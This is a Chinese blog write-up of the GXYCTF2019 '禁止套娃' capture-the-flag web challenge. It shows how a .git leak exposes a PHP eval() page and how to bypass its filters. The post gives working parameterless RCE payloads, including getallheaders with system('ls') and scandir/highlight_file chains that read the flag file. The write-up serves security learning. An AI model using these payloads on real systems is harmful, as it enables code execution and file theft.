[GXYCTF2019]禁止套娃 1

最新推荐文章于 2024-03-29 16:45:33 发布
最新推荐文章于 2024-03-29 16:45:33 发布
阅读量110 收藏
点赞数
分类专栏: CTF-WEB 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46196627/article/details/125303739
版权

[GXYCTF2019]禁止套娃1

抓包没有任何回显
在这里插入图片描述
dirsearch扫描没扫到任何备份文件。
猜测git泄露,尝试/.git/ 403无权访问 确定为git泄露
在这里插入图片描述
githack扫描

python GitHack.py http://21450f58-dc93-423a-9283-87b932ad1ee4.node4.buuoj.cn:81/.git/

存在index.php文件
在这里插入图片描述

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

代码:
判断exp是否get传参,过滤data:// filter:// php:// phar:// 包括大小写
preg_replace替换 ((?R)?)/相当于无限递归,匹配()里[a-z,_]并替换成null 最后只剩下;
后过滤/et|na|info|dec|bin|hex|oct|pi|log/ 包含大小写

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

限制无法传参,即REC无参数注入

无参数REC 一般有三种绕过姿势:

gettallheaders()获取header以数组形式输出,配合implode()能够直接将getallheaders()返回的数组转化为字符串。implode(getallheaders()); 姿势:url:?exp=eval(implode(getallheaders()));在header中插入system('ls')// 原理:会执行payload

get_defined_vars() 获取所有的已定义变量且是二维数组,配合current函数可以返回数组中的单元且初始指针指向数组的第一个单元

session_id() ?exp=highlight_file( session_id(session_start())); session_id()的作用就是获取当前会话的ID,cookie中phpsession,session 识别原因在构造前应先将语句转化为十六进制。hex2bin(session_id(session_start()));

网上流传的payload
构造payload :

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

在这里插入图片描述

highlight_file:函数对文件进行语法高亮显示,等同于show_source
next:函数将内部指针指向数组中的下一个元素,并输出。
array_revers:函数以相反的元素顺序返回数组
scandir:内置函数,用于返回指定目录的文件和目录。
pos:内置函数用于返回内部指针当前指向的数组中元素的值
localeconv() 小数点字符

?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));

array_rand:函数返回数组中的随机键名,或者规定函数返回不只一个键名,则返回包含随机键名的数组
array_flip:反转数组中所有的键以及它们关联的值,相等于array_revers
current:函数返回数组中当前元素的值
在这里插入图片描述

原理方式依据最开始 REC无参数注入

龙咯李
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]禁止套娃1(两种方法)
m0_62879498的博客
05-02 4691
[GXYCTF2019]禁止套娃 1 进入环境,只有一串字符 查看源代码 抓包 什么都没有发现 尝试使用御剑进行目录爆破 也只是爆出了index.php 然后 尝试直接使用 php伪协议进行一个 flag 读取 但都失败了。在这种情况下,肯定是服务器进行了一个过滤。所以,我怀疑可能是源码泄露 。 尝试使用 GitHack 看看是不是源码泄露 GitHack 下载地址:https://github.com/lijiejie/GitHack 扒下了网站的源码 好了,现在就是代码审计了 最吸引眼球
## [GXYCTF2019]禁止套娃### 1
最新发布
sulide_moon的博客
05-08 1502
方法二 上面 的正则过滤中 其实并没有过滤掉 session_id() 所以我们可以使用 session_id来获取 flag session_id() 可以用来获取/设置 当前会话 ID。session_id(session_start()) 使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。session_id()可以获取到当前的session id。die("还差一点哦!die("还想读flag,臭弟弟!
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃奖品Java程序
08-12
1. **类与对象**:Java是面向对象的语言,程序可能会定义多个类,如`RussianDoll`,每个类代表一个套娃,包含其属性(如大小、颜色)和方法(如打开、放入小套娃)。 2. **递归数据结构**:为了模拟套娃的嵌套结构...
俄罗斯套娃奖品C++程序
05-19
1. **类与对象**:C++中的面向对象编程允许我们定义类来封装数据和操作数据的方法,创建对象来表示现实世界中的实体,比如每个“娃娃”都可以是一个对象,拥有自己的属性(如大小、颜色等)和行为(如打开、关闭等)...
俄罗斯套娃程序及设计
06-09
1. **递归函数遍历可达路径**:算法的核心是通过递归函数来探索所有可能的路径。递归函数会从当前位置出发,递归地尝试所有可行的下一步,直到到达目标或者无路可走。 2. **记录路径和当前重量**:在递归调用中,...
别致的俄罗斯套娃广场.ppt
03-13
1. **多媒体应用**:PPT(PowerPoint)是一种常见的多媒体演示工具,用于制作包含文字、图片、音频(如“音乐:陈楚生 - 天长地久”)等多种媒体元素的演示文稿,这涉及到多媒体内容的整合与设计。 2. **数字内容...
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1730
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
[GXYCTF2019]禁止套娃1 不会编程的崽的博客
不会编程的崽的博客
02-05 1250
ctf 源码泄露 无参数rce
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1391
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
无参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 891
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
[GXYCTF2019]禁止套娃1 writeup
m0_65080524的博客
08-14 190
preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) : 对输入参数exp做了过滤,把data、filter、php,phar等等php伪协议,别看好像很多\和/ 其实原型是data:// 然后利用\ 去转义/ 所以就变成data:\ /\ /preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) 过滤了很多敏感文件的关键字。
[GXYCTF2019]禁止套娃1(无参RCE)
BoJing6的博客
03-29 357
这一题用githack获取源码我就不讲了,我想说的是这个题的方法和我自己的理解!这段代码就是禁止我们用一些php伪协议之类的东西if(';R)?这个就比较有意思了大概的意思就是把'a-z,_'之后的东西转义为NULL,通俗来说就是可以使用函数但是不能使用参数,下面是在shell中的测试结果解法一:函数介绍:scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值